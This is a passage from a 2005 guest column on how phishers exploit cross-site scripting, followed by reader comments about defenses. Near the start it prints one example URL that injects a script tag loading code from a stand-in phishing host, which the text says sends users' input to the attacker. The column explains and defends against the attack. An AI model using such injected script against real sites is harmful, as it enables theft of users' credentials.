RSSWhat Phishers Know That You Don't
By By Jeremiah Grossman, Guest Columnist | Published April 29, 2005, 10:22 AM
(continued from previous page)
Consider the following URL: http://therealwebsite.com/path/<script%20src=http://phishingsite.com/xss.js></script>
As before, when a user looks at the above Web address, the link still appears completely legitimate, because it is. The difference with this attack is that when a user clicks, they're not redirected, instead they remain on the real Web site. By using an injected script tag, Phishers can alter the behavior of a Web page. The malicious code transmits any information the user enters directly to the Phisher.
Think of it as Web page spyware. The insidiousness of the attack is that the user remains on the real Web site before and after they click, leaving them unprotected and unaware that anything happened.
Even scarier, there are other ways users may be victimized without clicking. Now it's only a matter of visiting the wrong Web page. Many Web sites allow content submissions from third-parties that site visitors can view, including message boards, blog posts/comments, guest books, auction and personals listings, and many other forms of community driven content.
If an XSS vulnerability exists in any of these systems (think eBay, Yahoo, Amazon, Blogger, etc.), a Phisher could submit malicious script code and anyone visiting the page would become instantly affected. No need to click anything in your inbox.
Financial services, e-commerce and healthcare Web security professionals all face the same risk, that their organization's Web site becomes the phishing Web site used to harvest consumer data. Again, none of the solutions I mentioned above can protect against these attacks. No man-in-the-middle server exists, so SSL and token authentication won't raise a red flag. There's no third-party phishing site, so obviously take-down and blacklist services have nothing fake to detect.
That leaves us with e-mail encryption and A/V scanners, which are not effective in this case. While I certainly won't recommend that people ignore these products, let's be clear. One way or another, by e-mail/IM/blog spam, malware, or casual Web surfing, consumers are going to stumble across a piece of XSS code. It's just that simple. See why the Phishers are laughing?
Cross-site scripting can occur on any Web site regardless of platform, language or technology. The smart bet is that just about every Web site has at least one issue and likely a whole lot more. How can Web developers protect consumers from XSS? Find and fix your cross-scripting vulnerabilities. Diligently validate all incoming data and strip out malicious tags.
Never, ever, ever trust client-side data. This is the most important security lesson for a Web developer to learn.
How can users protect themselves from XSS? Be extremely skeptical about any unexpected e-mail asking you to visit a Web site and do something. If you think the e-mail might be real but you're unsure, type the Web site domain name manually into your browser or use a bookmark. A healthy dose of paranoia is the best defense.
Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security, where he is responsible for Web application security R&D and industry evangelism. As a 7-year industry veteran and well-known security expert, Mr. Grossman is a frequent conference speaker. Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to founding WhiteHat, Mr. Grossman was an information security officer at Yahoo, responsible for performing security reviews on the company's hundreds of Web sites.
Just found this:
http://toolbar.netcraft.com/
It looks promising. I've already tested it on some phishing sites I knew of and it worked - it popped up a warning telling me about possible XSS. Maybe we're closer to a solution than I thought. Then again, maybe not.
Score: 0
|Could a website create a sort of unreproducable graphic? Like the Holograms on MS CD's or a water mark on a dollar bill that verify's the authenticity of the page.
If Ebay, Amazon or Google decide to nip this issue the could develop some sort of element that says this is authentic.
If certain elements or iamges are being hijacked or not served from the correct server, then a message saying 'this is not an authentic source' could be shown.
While I'm not a developer by trade I do have some devlopment background. I just figure Amazon or Google who love technology could come up with something interesting.
Score: 0
|BetaNews mentions everything except the only real solution which is taking legal action against phishers.
Score: 0
|What will be more interesting is that Microsoft will not be able to address this issue it looks like with longhorn, and certainly not with XP's certain tools. Microsoft finally included a decent level of security with XP, with a firewall that does well enough and bugging the user to stay up to date with AV... but phishing is an open hole and it will take education, not definition-based updates or toolbars or browser updates to stop this. It could seriously erode people's confidence in computing in general, let alone browsing the web, at least for people burnt by this.
Score: 0
|I'm not going to act like I know anymore about phishing than is explained in this article, but it seems like there would have to be some way to have the browser be able to identify XSS, either through a plugin (i.e. Firefox plugins) or maybe even a function integrated into future browsers (IE8 maybe? lol - it would take that long).
Is anyone formulating ideas for a service or product that can help with this? Like I said below, in my humble amateurish opinion, it seems like this would be easier to tackle on the client side. That's just my two cents.
Score: 0
|The basic problem is the incredible lack of knowledge of most PC users of how to use their OS. These are not "noobies". Some of these people have been using computers for many years. They don't realize that Windows has a command line, can't create toolbars in the taskbar, move icons to the QuickLaunch Bar and have never edited their registry.
When they download software they almost always think that bigger is better. These people don't have a clue or know where to buy one. There are a lot of "so-called" experts who have never written a lesson plan or created a training module, so their "help" is in computer jargon that only geeks can understand.
If you have no idea of how to install and configure your OS. Understand what a baseline and system image are, then phishers are going to eat your system. This is an even bigger problem if you have lots of bandwidth.
Score: 0
|We got to stop whining now, what part of DO NOT give out account information, SSN or other sensible data online, does people not understand? my bank for example tells me loud and clear that they will NEVER ask for such things other than via snail mail, so since I actually read my terms of service agreement I discard ALL email sent from "them" to me, it is THAT easy to avoid phishing.
And hey IF the message was genuine, then they are out of luck because you are just following your agreement.
So stop whining, you would not give ME any info if I walked up to you on the street and introduced myself as your Banker would you? it is the same with emails etc.
Score: 0
|lol. ummm... did you read beyond the 4th paragraph? This vulnerability is not related to e-mail. XSS can be exploited on any site that allows third parties to post information (Google, eBay, Amazon, etc...). We are far beyond the age where e-mail attachments were the biggest concern.
This scam can easily affect ANYONE if they are not careful. This time you don't have to click the link in the e-mail that says "get more smileys" ;-)
Score: 0
|When I posted this comment, this was in the address bar:
http://www.betanews.com/http://hackersheaven.com/
Is that normal? :p
That was really interesting. Is there any way to identify these tricks on the client side? For example, could someone write a FireFox plugin that checks the address bar for multiple domains? Or would that even work in most cases?
Anyway, I'm definitely going to be more paranoid from now on. Thanks a lot :p
Score: 0
|There is a good plug-in for FirFox called spoof-stix. It is a toolbar that tells you what site you are on reguardless of what URL you typed in the address bar....
Score: 0
|These XSS vulnerabilities that Phishers exploit are all the more dangerous because they originate __from the valid site__, yet the attacker can still execute malicious code.
The firefox plugin you mention will not protect you in any way from the class of vulnerabilities Jeremiah described.
Score: 0
|That sounds like it would help a little, but would it catch scripts in the URL that could redirect information entered on the website?
I was wondering if someone could write a plugin like that to look for more than one domain and/or scripts that could be malicious.
It sounds to me like this problem would be much simpler to tackle on the client-side than on the server side, but that is just my humble amateurish opinion.
Score: 0
|